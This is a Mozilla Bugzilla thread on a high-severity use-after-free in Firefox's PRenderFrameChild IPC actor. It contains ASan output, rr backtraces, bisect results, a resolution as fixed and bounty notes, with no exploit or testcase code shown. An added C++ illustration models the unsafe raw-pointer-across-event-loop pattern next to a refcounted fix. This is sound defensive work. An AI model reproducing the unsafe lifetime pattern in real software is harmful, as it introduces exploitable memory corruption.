Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==17569==ABORTING
Attached file: ASAN output (deleted)
Group: core-security → layout-core-security
Flags: sec-bounty?
Keywords: crash, sec-high, testcase
The first testcase doesn't crash for me (on Linux64).
This one does though.
Looks like we're trying to delete an actor twice:

(rr) fr 3
#3  0x00007f8fcfcb124b in mozilla::layout::PRenderFrameChild::Send__delete__ (actor=0x604000146e50) at ipc/ipdl/PRenderFrameChild.cpp:65
65          IPC::Message* msg__ = PRenderFrame::Msg___delete__((actor)->Id());
(rr) p/x *actor
$4 = {
  <mozilla::ipc::IProtocol> = {
    <mozilla::ipc::HasResultCodes> = {<No data fields>}, 
    members of mozilla::ipc::IProtocol: 
    _vptr$IProtocol = 0x7f8f7f0000a2, 
    static kNullActorId = 0x0, 
    static kFreedActorId = 0x1, 
    mId = 0x1, 
    mSide = 0x1, 
    mManager = 0x6190006edce0, 
    mChannel = 0x61d0000173a8
  }, 
  members of mozilla::layout::PRenderFrameChild: 
  mState = 0x1
}
(rr) rc

Thread 1 hit Hardware watchpoint 2: -location actor->mId

Old value = 1
New value = -9
0x00007f8fcf8f64fe in mozilla::ipc::IProtocol::Unregister (this=0x604000146e50, aId=-9) at ipc/glue/ProtocolUtils.cpp:432
432         mId = kFreedActorId;
(rr) bt 24
#0  0x00007f8fcf8f64fe in mozilla::ipc::IProtocol::Unregister (this=0x604000146e50, aId=-9) at ipc/glue/ProtocolUtils.cpp:432
#1  0x00007f8fcfcb15a4 in mozilla::layout::PRenderFrameChild::DestroySubtree (this=0x604000146e50, why=mozilla::ipc::IProtocol::AncestorDeletion) at ipc/ipdl/PRenderFrameChild.cpp:138
#2  0x00007f8fcfe843d8 in mozilla::dom::PBrowserChild::DestroySubtree (this=<optimized out>, why=mozilla::ipc::IProtocol::Deletion) at ipc/ipdl/PBrowserChild.cpp:4974
#3  0x00007f8fcfe83cf0 in mozilla::dom::PBrowserChild::Send__delete__ (actor=0x6190006edce0) at ipc/ipdl/PBrowserChild.cpp:1933
#4  0x00007f8fd3360579 in mozilla::dom::TabChild::DelayedDeleteRunnable::Run (this=<optimized out>) at dom/ipc/TabChild.cpp:327
#5  0x00007f8fceeb3dfe in nsThread::ProcessNextEvent (this=<optimized out>, aMayWait=<error reading variable: access outside bounds of object referenced via synthetic pointer>, aResult=0x7ffdea61aea0) at xpcom/threads/nsThread.cpp:1437
#6  0x00007f8fceeb6f61 in NS_ProcessNextEvent (aThread=0x61400000ca40, aMayWait=<error reading variable: access outside bounds of object referenced via synthetic pointer>) at xpcom/threads/nsThreadUtils.cpp:489
#7  0x00007f8fd36f65ad in mozilla::SpinEventLoopUntil<(mozilla::ProcessFailureBehavior)1, mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*)::$_0>(mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*)::$_0&&, nsIThread*) (aPredicate=<optimized out>, aThread=<optimized out>) at dist/include/nsThreadUtils.h:323
#8  0x00007f8fd36f4db4 in mozilla::dom::XMLHttpRequestMainThread::SendInternal (this=<optimized out>, aBody=0x7ffd00000002) at dom/xhr/XMLHttpRequestMainThread.cpp:3088
#9  0x00007f8fd370cae2 in mozilla::dom::XMLHttpRequestMainThread::Send (this=0x6170000b4480, aCx=0x7ffdea61bc10, aString=..., aRv=...) at dom/xhr/XMLHttpRequestMainThread.h:379
#10 0x00007f8fd1d7b845 in mozilla::dom::XMLHttpRequestBinding::send (cx=0x61d00003fc80, obj=..., self=0x6170000b4480, args=...) at dom/bindings/XMLHttpRequestBinding.cpp:783
#11 0x00007f8fd23f701b in mozilla::dom::GenericBindingMethod (cx=0x61d00003fc80, argc=<optimized out>, vp=<optimized out>) at dom/bindings/BindingUtils.cpp:3028
#12 0x00007f8fd669cd1b in js::CallJSNative (cx=0x61d00003fc80, native=0x7f8fd23f6c10 <mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*)>, args=...) at js/src/jscntxtinlines.h:293
#13 js::InternalCallOrConstruct (cx=0x61d00003fc80, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:470
#14 0x00007f8fd669d14f in InternalCall (cx=0x61d00003fc80, args=...) at js/src/vm/Interpreter.cpp:515
#15 0x00007f8fd668be8b in Interpret (cx=0x604000146e58, state=...) at js/src/vm/Interpreter.cpp:3060
#16 0x00007f8fd667e153 in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:410
#17 0x00007f8fd669cb37 in js::InternalCallOrConstruct (cx=0x604000146e58, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:488
#18 0x00007f8fd669d14f in InternalCall (cx=0x61d00003fc80, args=...) at js/src/vm/Interpreter.cpp:515
#19 0x00007f8fd669d322 in js::Call (cx=0x61d00003fc80, fval=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:534
#20 0x00007f8fd6cfa250 in JS::Call (cx=0x61d00003fc80, thisv=..., fval=..., args=..., rval=...) at js/src/jsapi.cpp:2948
Severity: normal → critical
I have no clue who handles PRenderFrameChild bugs.  Web Painting maybe?
Feel free to re-assign if not.
Component: Layout → Layout: Web Painting
Keywords: csectype-uaf
Probably belongs in graphics:layers, based on the two most recent tweaks to RenderFrameChild.h (bug 1056427, bug 1103107).

nical, would you be the right person to look into this maybe?  (Or, do you know who else might know about the lifetime of PRenderFrameChild?)
Component: Layout: Web Painting → Graphics: Layers
Flags: needinfo?(nical.bugzilla)
I am not very well versed in the arcana of the PContent and PTab protocols, but the rr stack Mats collected with the stack of the crash gives a good indication that the problem was introduced through the nested event loop from bug 1343728. Something caused the PRenderFrameChild to be deleted from within the nested event loop (looks like it's destruction of the managing protocol) which apparently isn't expected by the code that tries to delete it again right after the end of the nested event loop under certain conditions.

I suppose that this could be hacked around by reference counting the RenderFrameChild and delaying the actual deletion to when the refcount gets to zero in addition to whatever originally triggers its destruction.
Flags: needinfo?(nical.bugzilla) → needinfo?(michael)
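An added illustration of the lifetime problem described in the comment above (not Firefox code and not from anyone in this thread; the actor and event loop types are hypothetical stubs): a raw pointer held across a nested event loop that frees the actor, beside the refcounted variant where the second delete is skipped.

```cpp
#include <functional>
#include <memory>
#include <queue>
#include <utility>

// Hypothetical stand-in for an IPDL child actor; not PRenderFrameChild itself.
struct ActorStub {
    bool destroyed = false;    // set when the managing protocol tears it down
    int sendDeleteCalls = 0;   // how many Send__delete__ calls reached it
};

// Toy event loop standing in for the nested SpinEventLoopUntil in the trace.
struct EventLoop {
    std::queue<std::function<void()>> events;
    void SpinUntilEmpty() {
        while (!events.empty()) {
            auto e = std::move(events.front());
            events.pop();
            e();
        }
    }
};

// Unsafe pattern: a raw pointer is held across the nested loop. If an event
// frees the actor mid-spin, the Send__delete__ afterwards would be a UAF.
// Returns true when that would have happened (we stop instead of dereferencing).
bool UnsafeProvideWindow(bool teardownDuringSpin) {
    auto owner = std::make_unique<ActorStub>();
    ActorStub* raw = owner.get();
    EventLoop loop;
    if (teardownDuringSpin) loop.events.push([&owner] { owner.reset(); });
    loop.SpinUntilEmpty();
    if (!owner) return true;   // 'raw' now dangles; ASan would report raw-> here
    raw->sendDeleteCalls++;    // the Send__delete__ that the ASan report flags
    return false;
}

// Hardened pattern (the refcount idea above): take a strong reference before
// spinning, let teardown only mark the actor and drop its own ref, and skip
// the second delete if it already happened. Returns Send__delete__ calls issued.
int SafeProvideWindow(bool teardownDuringSpin) {
    auto owner = std::make_shared<ActorStub>();
    std::shared_ptr<ActorStub> grip = owner;   // keeps the actor alive
    EventLoop loop;
    if (teardownDuringSpin)
        loop.events.push([&owner] { owner->destroyed = true; owner.reset(); });
    loop.SpinUntilEmpty();
    if (grip->destroyed) return 0;   // already deleted by the parent side
    grip->sendDeleteCalls++;
    return grip->sendDeleteCalls;
}
```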
This is the same as bug 1378374 I think.
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(michael)
Resolution: --- → DUPLICATE
Component: Graphics: Layers → IPC
Since this is the older bug, and nominated for a bug bounty, I'd prefer not closing it "duplicate". If you think bug 1378374 has enough useful progress that you don't want to dupe the other way then let's at least make this "depends on" that one so we get the bounty award right when it's fixed.
Status: RESOLVED → UNCONFIRMED
Depends on: 1378374
Ever confirmed: false
Resolution: DUPLICATE → ---
I was able to bisect this with mozregression using testcase #2.

INFO: Last good revision: 201b30adaf89493e1fdd200a4ce9172bb905a33d
INFO: First bad revision: 1f83a9089442610aee9e2865cd6bc508bda35f11
INFO: Pushlog:
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=201b30adaf89493e1fdd200a4ce9172bb905a33d&tochange=1f83a9089442610aee9e2865cd6bc508bda35f11

Bug 1374548 I guess?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(hshih)
I think bug 1343728 is the actual regressor (based on the other bug).
Flags: needinfo?(hshih)
(In reply to Michael Layzell [:mystor] from comment #7)
> This is the same as bug 1378374 I think.

If true then this testcase should also be fixed. Nils, can you reproduce this testcase?
Flags: needinfo?(nils)
Al, I can't reproduce on the latest ASAN build.
Flags: needinfo?(nils)
Dan, I suppose we can close this looking at comment 8 and comment 13?
Flags: needinfo?(dveditz)
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(dveditz)
Keywords: regression
Resolution: --- → FIXED
Whiteboard: fixed by bug 1378374
Group: layout-core-security → core-security-release
Flags: sec-bounty? → sec-bounty+
Flags: qe-verify+
Whiteboard: fixed by bug 1378374 → [post-critsmash-triage] fixed by bug 1378374
I've tried to reproduce this bug using a few affected ASAN builds (e.g. Nightly 56.0a1, 2017-07-04), but neither of the test cases (from comment 0 and comment 2) crashed on my Ubuntu 16.04 x64 LTS.

Nils, I've seen you already verified this bug last month; do you think we are safe to close this bug as verified fixed per comment 13, since I wasn't able to reproduce the initial issue?
Flags: needinfo?(nils)
Group: core-security-release
Attachment #8909382 - Attachment description: nils@vulndev.org,4000?,2017-07-04,2017-09-13,2017-09-18,true,,, → nils@vulndev.org,4000,2017-07-04,2017-09-13,2017-09-18,true,,,